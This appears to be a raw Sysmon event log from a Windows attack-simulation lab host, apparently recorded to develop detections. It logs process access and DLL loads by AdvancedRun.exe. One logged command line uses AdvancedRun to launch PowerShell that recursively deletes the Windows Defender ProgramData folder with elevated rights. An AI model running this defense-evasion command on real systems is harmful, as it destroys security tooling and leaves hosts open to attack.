\""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 10341000x80000000000000003912182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.396{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.396{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.396{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003912167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.287{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.287{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.240{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003912161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003912160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003912159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003912158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003912157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 